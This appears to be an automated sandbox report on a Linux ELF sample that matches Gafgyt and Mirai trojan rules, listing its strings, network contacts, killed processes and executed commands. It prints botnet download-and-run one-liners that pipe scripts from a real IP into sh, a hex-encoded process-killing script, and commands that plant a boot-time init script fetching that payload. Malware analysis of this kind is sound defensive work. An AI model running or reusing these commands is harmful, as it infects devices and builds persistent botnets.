Source: x86_64.nn.elf |
String: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/ /proc-altered/tmp/.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_1104mallocwaitpid/etc/motd%s |
Source: x86_64.nn.elf |
String: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A" |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 29.106.49.102 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 199.190.139.207 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 142.153.92.147 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.143.44.39 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 183.156.198.197 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 191.66.238.241 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 25.71.250.215 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 83.250.100.168 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 88.226.239.116 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 93.242.14.191 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 134.98.226.149 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 136.230.254.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 155.221.3.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.216.239.186 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 18.189.145.207 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 187.122.71.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 113.29.219.113 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 179.63.253.248 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 156.71.194.88 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 71.67.202.25 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 165.215.253.239 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 177.136.218.10 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 33.92.170.14 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 167.68.175.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 160.49.103.171 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 143.151.115.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 71.138.199.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 140.81.107.251 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.32.34.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 44.61.16.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 98.30.50.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 59.153.102.247 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 71.203.45.123 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 82.22.233.228 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.227.234 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 29.106.49.102 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 199.190.139.207 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 142.153.92.147 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.235.85.224 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.143.44.39 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 183.156.198.197 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 191.66.238.241 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 25.71.250.215 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 83.250.100.168 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 88.226.239.116 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 93.242.14.191 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 134.98.226.149 |
Source: x86_64.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr |
String found in binary or memory: http://94.156.227.233/ |
Source: x86_64.nn.elf |
String found in binary or memory: http://94.156.227.233/curl.sh |
Source: x86_64.nn.elf |
String found in binary or memory: http://94.156.227.233/lol.sh |
Source: x86_64.nn.elf |
String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/ /proc-altered/tmp/.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s/snap/snapd/15534 |
Source: Initial sample |
String containing 'busybox' found: usage: busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox hostname PBOC |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo > |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -ne |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep |
Source: Initial sample |
String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0 |
Source: Initial sample |
String containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7 |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 794, result: successful |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 888, result: successful |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 1659, result: successful |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 3212, result: successful |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 3218, result: successful |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 5652, result: successful |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5608) |
SIGKILL sent: pid: 5691, result: successful |
Jump to behavior |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: x86_64.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: 5554.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16 |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5660/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5661/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5662/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5640/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5663/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5740/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5664/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5741/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5739/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5654/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5731/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5655/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5732/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5656/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5733/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5657/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5734/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5658/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5735/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5659/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5736/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5737/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5738/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5670/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5651/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5695/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5652/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5653/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5697/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5730/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5391/cmdline |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5728/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/1/cmdline |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5729/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5665/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5742/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5666/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5667/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5668/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/803/cmdline |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5669/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5725/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5726/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5607) |
File opened: /proc/5727/status |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5573) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5593) |
Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5595) |
Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5597) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh" |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5598) |
Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5600) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Jump to behavior |
Source: /tmp/x86_64.nn.elf (PID: 5602) |
Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1" |
Jump to behavior |